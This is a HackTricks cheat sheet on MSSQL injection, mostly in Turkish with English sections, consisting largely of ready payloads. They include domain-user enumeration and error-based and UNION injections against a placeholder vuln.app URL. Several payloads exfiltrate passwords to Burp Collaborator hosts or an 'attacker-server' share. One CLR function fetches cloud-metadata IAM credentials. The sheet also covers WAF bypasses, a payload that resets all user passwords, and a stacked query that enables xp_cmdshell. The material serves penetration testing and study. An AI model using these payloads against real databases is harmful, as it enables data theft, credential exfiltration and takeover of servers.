MSSQL Injection

Reading time: 8 minutes

tip

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
Bize katılın 💬 Discord grubuna veya telegram grubuna veya bizi takip edin Twitter'da 🐦 @hacktricks_live.
Hacking ipuçlarını paylaşın, HackTricks ve HackTricks Cloud github reposuna PR göndererek.

Active Directory enumeration

MSSQL sunucusu içinde SQL injection ile alan kullanıcılarını listelemek mümkün olabilir, aşağıdaki MSSQL fonksiyonlarını kullanarak:

SELECT DEFAULT_DOMAIN(): Mevcut alan adını alır.
master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator')): Alan adının adını biliyorsanız (DOMAIN bu örnekte) bu fonksiyon Yönetici kullanıcısının SID'sini hex formatında döndürecektir. Bu, 0x01050000000[...]0000f401 gibi görünecektir, son 4 byte'ın 500 sayısı olduğunu not edin, bu da yönetici kullanıcısının ortak kimliğidir.
Bu fonksiyon, alanın ID'sini bilmenizi sağlar (son 4 byte hariç tüm byte'lar).
SUSER_SNAME(0x01050000000[...]0000e803) : Bu fonksiyon, belirtilen ID'nin kullanıcı adını döndürecektir (varsa), bu durumda 0000e803 big endian == 1000 (genellikle bu, oluşturulan ilk normal kullanıcı ID'sidir). Sonra, 1000 ile 2000 arasındaki kullanıcı ID'lerini brute-force yapabileceğinizi ve muhtemelen alan kullanıcılarının tüm kullanıcı adlarını alabileceğinizi hayal edebilirsiniz. Örneğin, aşağıdaki gibi bir fonksiyon kullanarak:

python

def get_sid(n):
domain = '0x0105000000000005150000001c00d1bcd181f1492bdfc236'
user = struct.pack('<I', int(n))
user = user.hex()
return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000

Alternatif Hata Tabanlı Vektörler

Hata tabanlı SQL enjeksiyonları genellikle +AND+1=@@version-- gibi yapıları ve «OR» operatörüne dayanan varyantları andırır. Bu tür ifadeleri içeren sorgular genellikle WAF'lar tarafından engellenir. Bir geçiş olarak, aranan verilerde bir veri türü dönüşüm hatası tetikleyen belirli fonksiyon çağrılarının sonucuyla %2b karakterini kullanarak bir dize birleştirin.

Bu tür fonksiyonlardan bazı örnekler:

SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()

Fonksiyon USER_NAME() kullanımına örnek:

https://vuln.app/getItem?id=1'%2buser_name(@@version)--

SSRF

Bu SSRF hileleri buradan alındı

`fn_xe_file_target_read_file`

Sunucuda VIEW SERVER STATE izni gerektirir.

https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))

sql

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';
# Or doing
Use master;
EXEC sp_helprotect 'fn_xe_file_target_read_file';

`fn_get_audit_file`

CONTROL SERVER izni gerektirir.

https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))

sql

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_get_audit_file';

`fn_trace_gettabe`

CONTROL SERVER izni gerektirir.

https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))

sql

# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='CONTROL SERVER';
# Or doing
Use master;
EXEC sp_helprotect 'fn_trace_gettabe';

`xp_dirtree`, `xp_fileexists`, `xp_subdirs`

Microsoft tarafından resmi olarak belgelenmemiş olmasına rağmen, xp_dirtree gibi saklı yordamlar, MSSQL içindeki ağ işlemlerindeki faydaları nedeniyle çevrimiçi olarak başkaları tarafından tanımlanmıştır. Bu yordamlar genellikle Out of Band Veri sızdırma işlemlerinde kullanılır; çeşitli örneklerde ve paylaşımlarda sergilenmiştir.

Örneğin, xp_dirtree saklı yordamı, ağ istekleri yapmak için kullanılır, ancak yalnızca TCP port 445 ile sınırlıdır. Port numarası değiştirilemez, ancak ağ paylaşımlarından okuma yapmaya olanak tanır. Kullanımı aşağıdaki SQL betiğinde gösterilmektedir:

sql

DECLARE @user varchar(100);
SELECT @user = (SELECT user);
EXEC ('master..xp_dirtree "\\' + @user + '.attacker-server\\aa"');

Bu yöntemin, varsayılan ayarlarla çalışan Windows Server 2016 Datacenter üzerindeki Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) gibi tüm sistem yapılandırmalarında çalışmayabileceği dikkate değerdir.

Ayrıca, benzer sonuçlar elde edebilen master..xp_fileexist ve xp_subdirs gibi alternatif saklı prosedürler de bulunmaktadır. xp_fileexist hakkında daha fazla bilgiye bu TechNet makalesinde ulaşabilirsiniz.

`xp_cmdshell`

Açıkça, bir SSRF tetikleyen bir şeyi çalıştırmak için xp_cmdshell de kullanabilirsiniz. Daha fazla bilgi için sayfadaki ilgili bölümü okuyun:

1433 - Pentesting MSSQL - Microsoft SQL Server

MSSQL Kullanıcı Tanımlı Fonksiyonu - SQLHttp

Özel işlevleri yürütmek için MSSQL içinde yüklenmek üzere herhangi bir .NET dilinde yazılmış ve DLL'ye derlenmiş bir CLR UDF (Common Language Runtime Kullanıcı Tanımlı Fonksiyonu) oluşturmak, dbo erişimi gerektiren bir süreçtir. Bu, genellikle veritabanı bağlantısının sa olarak veya bir Yönetici rolü ile yapılması durumunda mümkündür.

Binary'nin MSSQL'e CLR derlemesi olarak yüklenmesini kolaylaştırmak için bu Github deposunda bir Visual Studio projesi ve kurulum talimatları sağlanmıştır; böylece MSSQL içinden HTTP GET isteklerinin yürütülmesi sağlanmaktadır.

Bu işlevselliğin temeli, bir GET isteği yürütmek ve içerik almak için WebClient sınıfını kullanan http.cs dosyasında kapsüllenmiştir; aşağıda gösterildiği gibi:

csharp

using System.Data.SqlTypes;
using System.Net;

public partial class UserDefinedFunctions
{
[Microsoft.SqlServer.Server.SqlFunction]
public static SqlString http(SqlString url)
{
var wc = new WebClient();
var html = wc.DownloadString(url.Value);
return new SqlString(html);
}
}

CREATE ASSEMBLY SQL komutunu çalıştırmadan önce, assembly'nin SHA512 hash'ini sunucunun güvenilir assembly'ler listesine eklemek için aşağıdaki SQL kodunu çalıştırmanız önerilir (görüntülemek için select * from sys.trusted_assemblies;):

sql

EXEC sp_add_trusted_assembly 0x35acf108139cdb825538daee61f8b6b07c29d03678a4f6b0a5dae41a2198cf64cefdb1346c38b537480eba426e5f892e8c8c13397d4066d4325bf587d09d0937,N'HttpDb, version=0.0.0.0, culture=neutral, publickeytoken=null, processorarchitecture=msil';

Assembly'i başarıyla ekledikten ve fonksiyonu oluşturduktan sonra, HTTP istekleri gerçekleştirmek için aşağıdaki SQL kodu kullanılabilir:

sql

DECLARE @url varchar(max);
SET @url = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/s3fullaccess/';
SELECT dbo.http(@url);

Hızlı Sömürü: Tek Bir Sorguda Tüm Tablo İçeriklerini Alma

Buradan hile.

Tek bir sorguda bir tablonun tam içeriğini çıkarmak için kullanılan özlü bir yöntem, FOR JSON ifadesini kullanmaktır. Bu yaklaşım, "raw" gibi belirli bir moda ihtiyaç duyan FOR XML ifadesine göre daha kısadır. Kısalığı nedeniyle FOR JSON ifadesi tercih edilmektedir.

İşte mevcut veritabanından şemayı, tabloları ve sütunları nasıl alacağınız:

`sql

https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
In situations where error-based vectors are used, it's crucial to provide an alias or a name. This is because the output of expressions, if not provided with either, cannot be formatted as JSON. Here's an example of how this is done:

```
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
<div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">`</span></div>

Retrieving the Current Query

Trick from here.

For users granted the VIEW SERVER STATE permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:

https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null

To check if you have the VIEW SERVER STATE permission, the following query can be used:

SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='VIEW SERVER STATE';

Little tricks for WAF bypasses

Tricks also from here

Non-standard whitespace characters: %C2%85 или %C2%A0:

https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--

Scientific (0e) and hex (0x) notation for obfuscating UNION:

https://vuln.app/getItem?id=0eunion+select+null,@@version,null--

https://vuln.app/getItem?id=0xunion+select+null,@@version,null--

A period instead of a whitespace between FROM and a column name:

https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--

\N separator between SELECT and a throwaway column:

https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--

WAF Bypass with unorthodox stacked queries

According to this blog post it's possible to stack queries in MSSQL without using ";":

SELECT 'a' SELECT 'b'

So for example, multiple queries such as:

use [tempdb]  
create table [test] ([id] int)  
insert [test] values(1)  
select [id] from [test]  
drop table[test]

Can be reduced to:

use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test]

Therefore it could be possible to bypass different WAFs that doesn't consider this form of stacking queries. For example:

# Gereksiz bir exec() ekleyerek WAF'ın bunun geçerli bir sorgu olmadığını düşünmesini sağlamak
admina'union select 1,'admin','testtest123'exec('select 1')--
## Bu şöyle olacak:
SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123'
exec('select 1')--'

# Garip bir şekilde oluşturulmuş sorgular kullanmak
admin'exec('update[users]set[password]=''a''')--
## Bu şöyle olacak:
SELECT id, username, password FROM users WHERE username = 'admin'
exec('update[users]set[password]=''a''')--'

# Ya da xp_cmdshell'i etkinleştirmek
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
## Bu şöyle olacak
select * from users where username = ' admin'
exec('sp_configure''show advanced option'',''1''reconfigure')
exec('sp_configure''xp_cmdshell'',''1''reconfigure')--